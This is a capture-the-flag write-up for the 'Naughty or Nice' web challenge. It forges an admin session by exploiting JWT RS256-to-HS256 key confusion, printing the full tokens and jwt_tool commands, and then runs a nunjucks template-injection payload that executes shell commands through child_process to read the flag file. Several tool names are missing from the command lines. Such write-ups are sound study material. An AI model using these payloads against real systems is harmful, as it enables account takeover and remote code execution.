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Naughty or Nice (325)


All the Santa's nice elves have been added to the naughty list by the wicked elves and Santa is mad! He asked you to hack into the admin account of the Naughty or Nice portal and retrieve the magic flag that will let Santa finally banish the evil elves from the north pole!


  1. Looking at the source code we see that in the challenge/helpers/JWTHelper.js file, both the "RS256" and "HS256" algorithms are allowed for decryption. This is CVE-2016-5431/CVE-2016-10555.

  2. The HS256 algorithm is symmetric, which means it uses the sane secret key to sign and verify each message. The RS256 algorithm is asymmetric, which means it uses a private key to sign the message and a public key for verification. However, if we change the algorithm from RS256 to HS256, the backend code will use the public key as the symmetric secret key. In other words, the HS256 algorithm will be used to verify the signature with the public key as the HS256 secret key. We know the public key so we can, in theory, easily modify the JWT and sign it.

  3. However, before we can do this we need to get the JWT token and get the public key. So, make an account on the website, open up your browser's cookie page in the developer tools, and copy the session cookie. We can use or ticarpi/jwt_tool to decode the cookie. python3 "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QiLCJwayI6Ii0tLS0tQkVHSU4gUFVCTElDIEtFWS0tLS0tXG5NSUlCSWpBTkJna3Foa2lHOXcwQkFRRUZBQU9DQVE4QU1JSUJDZ0tDQVFFQTNuWlpMWHB3R3prVXM0N1J6UkRpXG5idkNFZzFFcllrcC9LWk1hclVqZTVWRGljdDlzMXhFVkM1aXFvVmJ2U0Vkd0hoN3J0M0p1aUZIKzBPVTlWY0JUXG4rVHd3VHM3Y2toRG8rczFUVjhHV0RkWFFrb0l1dHRaak5DUUo2TG0zQ3ZlbEtJWW1jSUtwdlBCblRlRlJkMVh6XG5xUmdldnE2SlZSQ1lyeVFYMXhtckVQOVc5OFpWWGJQcE9GOTRHUWlpRU1RdWJNMGlMakdjVEFqRldVdXFaZlU3XG5iMWpDV1lIb1A4UWV6dmNBK1FCUndXN2dubHpCYVVCRmVNN3Y4Smw3cCtGVXFtQnI5VitOa2htMDV0L0ZraU95XG55dVgwa0FFcDFKNzRRZXRMSXg0d0tmbjBIZjZXeUp0ejB2ZnV6YkJETWh2VDZyZXBtSXpCVW9ycHh6bk5UVForXG5xd0lEQVFBQlxuLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tIiwiaWF0IjoxNjM4NzMxMzQ3fQ.bnjglGFat38YIylfRdN-AubHq7FIpPgrISj3rGlVUJti_8ORBgF6alQDyEr742vUYaFaaONnhUlgSKyurANLKI1fNpAZCp0loN5D_mSk8B8PMSNArghxLB1P_2g36pd7ZWE8GQPFF2582fOYCK1zJreMKPozXGe3fjBNB6nqrNk21ReFQsPpuLfPM8HgK3jPXgyN5mN4HKMsLgObrA-5W3IhWglV64BHuNbpki5x0OGMedxTEtzuYqAhQbkOhz7x_GLI8c04lyJSY9dYVaNSsmU84gZJZ-5Hmk4GlQTtRwrV_OnSVxampPUk8MhIIeLHhUOiaWrRtmLbxiV1EaPK6g":

    Decoded Token Values:
    Token header values:
    [+] alg = "RS256"
    [+] typ = "JWT"
    Token payload values:
    [+] username = "test"
    [+] pk = "-----BEGIN PUBLIC KEY-----
    -----END PUBLIC KEY-----"
    [+] iat = 1638731347    ==> TIMESTAMP = 2021-12-05 14:09:07 (UTC)
    JWT common timestamps:
    iat = IssuedAt
    exp = Expires
    nbf = NotBefore
  4. Fortunately for us, the public key is encoded in the JWT. So, to get access to the /api/elf/edit and /api/elf/list endpoints, we need to tamper with this token to change the username to "admin" using the RS256-to-HS256 exploit.

  5. There are an abundance of ways that you can perform the RS256-to-HS256 exploit: 3v4Si0N/RS256-2-HS256, ticarpi/jwt_tool, manually via, by running the commands in this excellent guide. However, you have to be very careful about newlines in the public key. I tried all of these methods with about every option possible, but I found that running this command actually worked: python3 -T "{JWT HERE}" -S hs256 -p "{PUBLIC KEY HERE}". (Alternatively, see Alternative JWT Decoding Steps for an approach using So, with the key that would look like this:

    python3 -T "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QiLCJwayI6Ii0tLS0tQkVHSU4gUFVCTElDIEtFWS0tLS0tXG5NSUlCSWpBTkJna3Foa2lHOXcwQkFRRUZBQU9DQVE4QU1JSUJDZ0tDQVFFQTNuWlpMWHB3R3prVXM0N1J6UkRpXG5idkNFZzFFcllrcC9LWk1hclVqZTVWRGljdDlzMXhFVkM1aXFvVmJ2U0Vkd0hoN3J0M0p1aUZIKzBPVTlWY0JUXG4rVHd3VHM3Y2toRG8rczFUVjhHV0RkWFFrb0l1dHRaak5DUUo2TG0zQ3ZlbEtJWW1jSUtwdlBCblRlRlJkMVh6XG5xUmdldnE2SlZSQ1lyeVFYMXhtckVQOVc5OFpWWGJQcE9GOTRHUWlpRU1RdWJNMGlMakdjVEFqRldVdXFaZlU3XG5iMWpDV1lIb1A4UWV6dmNBK1FCUndXN2dubHpCYVVCRmVNN3Y4Smw3cCtGVXFtQnI5VitOa2htMDV0L0ZraU95XG55dVgwa0FFcDFKNzRRZXRMSXg0d0tmbjBIZjZXeUp0ejB2ZnV6YkJETWh2VDZyZXBtSXpCVW9ycHh6bk5UVForXG5xd0lEQVFBQlxuLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tIiwiaWF0IjoxNjM4NzMxMzQ3fQ.bnjglGFat38YIylfRdN-AubHq7FIpPgrISj3rGlVUJti_8ORBgF6alQDyEr742vUYaFaaONnhUlgSKyurANLKI1fNpAZCp0loN5D_mSk8B8PMSNArghxLB1P_2g36pd7ZWE8GQPFF2582fOYCK1zJreMKPozXGe3fjBNB6nqrNk21ReFQsPpuLfPM8HgK3jPXgyN5mN4HKMsLgObrA-5W3IhWglV64BHuNbpki5x0OGMedxTEtzuYqAhQbkOhz7x_GLI8c04lyJSY9dYVaNSsmU84gZJZ-5Hmk4GlQTtRwrV_OnSVxampPUk8MhIIeLHhUOiaWrRtmLbxiV1EaPK6g" -S hs256 -p "-----BEGIN PUBLIC KEY-----
    -----END PUBLIC KEY-----"

    It's a pretty ugly command. You should be able to copy and paste the public key into a file called and then do something like python3 -X k -pk -pc username -pv admin (-X tells to use the key confustion exploit, which is what we want, and -pk tells it what key to use), but this didn't work for me. Also, the aforementioned guide should work too, but they both genereate invalid tokens. I'm not sure what I'm missing to get those tools working. By the way, 3v4Si0N/RS256-2-HS256 is an automated version of the aforementioned guide.

    The output of this command has the tampered token, which is eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGsiOiItLS0tLUJFR0lOIFBVQkxJQyBLRVktLS0tLVxuTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUEzblpaTFhwd0d6a1VzNDdSelJEaVxuYnZDRWcxRXJZa3AvS1pNYXJVamU1VkRpY3Q5czF4RVZDNWlxb1ZidlNFZHdIaDdydDNKdWlGSCswT1U5VmNCVFxuK1R3d1RzN2NraERvK3MxVFY4R1dEZFhRa29JdXR0WmpOQ1FKNkxtM0N2ZWxLSVltY0lLcHZQQm5UZUZSZDFYelxucVJnZXZxNkpWUkNZcnlRWDF4bXJFUDlXOThaVlhiUHBPRjk0R1FpaUVNUXViTTBpTGpHY1RBakZXVXVxWmZVN1xuYjFqQ1dZSG9QOFFlenZjQStRQlJ3Vzdnbmx6QmFVQkZlTTd2OEpsN3ArRlVxbUJyOVYrTmtobTA1dC9Ga2lPeVxueXVYMGtBRXAxSjc0UWV0TEl4NHdLZm4wSGY2V3lKdHowdmZ1emJCRE1odlQ2cmVwbUl6QlVvcnB4em5OVFRaK1xucXdJREFRQUJcbi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLSIsImlhdCI6MTYzODczMTM0N30.Eo4x1pdGAmIyQTZhCl7kUkuSxiCZvmAPU1G2s5i9erY.

  6. Anyway, once you have the tampered token, swap it out with the non-admin token in your browser's developer tools. Now, we can access the admin dashboard and the /api/elf/edit and /api/elf/list endpoints.

  7. Back in the source code, if we look at the challenge/routes/index.js file we see that the / endpoint uses the CardHelper class to generate the card with a list of the elf's names. Since we are now an admin, we can edit the names of these elfs, and thus we control this value. Looking at challenge/helpers/CardHelper.js, we notice that the nunjucks templating engine is used and that we can contol what is passed to a nunjucks template. Thus, this is a nunjucks SSTI (Server-Side Template Injection).

  8. Searching for "nunjucks ssti" reveals this great guide about breaking out of the nunjucks templating engine. We can run {{range.constructor("return global.process.mainModule.require('child_process').execSync('cat /flag*')")()}} to print the contents of the /flag file. We determined that this is where the flag is by looking at the Dockerfile in the challenge ZIP. The flag file is copied to /flag within the container.

  9. So, in the admin dashboard, we copy and paste out payload {{range.constructor("return global.process.mainModule.require('child_process').execSync('cat /flag*')")()}} into one off the elf's name field, submit the changes, and then we navigate back to the home page, /, and there's the flag. You can view the source of this page to make copy and pasting the flag easier.

Alternative JWT Decoding Steps

  1. Get a JWT token from the application by signing into any account and paste it into

  2. Copy the public key and make sure that there is no new line at the end. I got this public key from -----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3nZZLXpwGzkUs47RzRDi\nbvCEg1ErYkp/KZMarUje5VDict9s1xEVC5iqoVbvSEdwHh7rt3JuiFH+0OU9VcBT\n+TwwTs7ckhDo+s1TV8GWDdXQkoIuttZjNCQJ6Lm3CvelKIYmcIKpvPBnTeFRd1Xz\nqRgevq6JVRCYryQX1xmrEP9W98ZVXbPpOF94GQiiEMQubM0iLjGcTAjFWUuqZfU7\nb1jCWYHoP8QezvcA+QBRwW7gnlzBaUBFeM7v8Jl7p+FUqmBr9V+Nkhm05t/FkiOy\nyuX0kAEp1J74QetLIx4wKfn0Hf6WyJtz0vfuzbBDMhvT6repmIzBUorpxznNTTZ+\nqwIDAQAB\n-----END PUBLIC KEY-----.

  3. Base64 encode the public key with echo -en "public key" | base64. We use the -e and -n flags with echo to tell it to intepret escape sequences and to not output a newline at the end.


    echo -en "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3nZZLXpwGzkUs47RzRDi\nbvCEg1ErYkp/KZMarUje5VDict9s1xEVC5iqoVbvSEdwHh7rt3JuiFH+0OU9VcBT\n+TwwTs7ckhDo+s1TV8GWDdXQkoIuttZjNCQJ6Lm3CvelKIYmcIKpvPBnTeFRd1Xz\nqRgevq6JVRCYryQX1xmrEP9W98ZVXbPpOF94GQiiEMQubM0iLjGcTAjFWUuqZfU7\nb1jCWYHoP8QezvcA+QBRwW7gnlzBaUBFeM7v8Jl7p+FUqmBr9V+Nkhm05t/FkiOy\nyuX0kAEp1J74QetLIx4wKfn0Hf6WyJtz0vfuzbBDMhvT6repmIzBUorpxznNTTZ+\nqwIDAQAB\n-----END PUBLIC KEY-----" | base64


  4. Paste the JWT into again. Then, change change the algorithm to "HS256" and change the username field to "admin". Next, paste the base64 encoded key into the "your-256-bit-secret" field. Check the "secret base64 encoded" box, and now you should have your tampered JWT.

